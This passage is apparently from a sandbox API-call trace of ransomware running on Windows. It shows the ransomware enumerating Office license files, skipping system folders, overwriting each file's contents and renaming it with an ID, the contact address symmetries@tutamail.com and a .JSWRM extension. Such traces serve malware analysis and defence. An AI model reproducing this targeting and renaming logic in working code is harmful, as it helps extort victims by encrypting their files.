Flags=0x0, Size=0x10) returned 0x23a270 [0108.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0108.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0108.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.156] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0108.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0108.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0108.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0108.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0108.157] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe96e2d19, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe96e2d19, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe97a18e9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bc7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_Subscription-pl.xrm-ms", cAlternateFileName="PR1082~1.XRM")) returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned -1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.157] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0108.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0108.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0108.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0108.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-pl.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0108.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0108.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0108.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0108.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.158] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11207) returned 1 [0108.159] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0108.159] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0108.169] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.170] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0108.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.170] CloseHandle (hObject=0x45c) returned 1 [0108.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0108.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0108.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0108.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0108.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0108.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0108.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.171] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0108.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0108.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0108.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.173] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe96bcab7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe96bcab7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe977b69a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x535d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_Subscription-ppd.xrm-ms", cAlternateFileName="PR5FF4~1.XRM")) returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.173] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0108.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0108.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0108.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0108.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0108.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0108.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0108.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0108.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0108.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0108.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0108.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.174] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21341) returned 1 [0108.174] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5350) returned 0x24c1d0 [0108.174] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5350, lpOverlapped=0x0) returned 1 [0108.205] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.205] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5350, lpOverlapped=0x0) returned 1 [0108.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.205] CloseHandle (hObject=0x45c) returned 1 [0108.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0108.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0108.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0108.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0108.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0108.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0108.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.206] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0108.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0108.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0108.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.207] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9a03ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9a03ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9ac2a76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d86, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="PR48AD~1.XRM")) returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.210] lstrcmpiW (lpString1="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0108.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0108.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0108.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0108.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0108.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0108.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0108.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0108.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0108.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0108.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0108.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.211] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11654) returned 1 [0108.211] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0108.211] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0108.214] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.214] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0108.214] 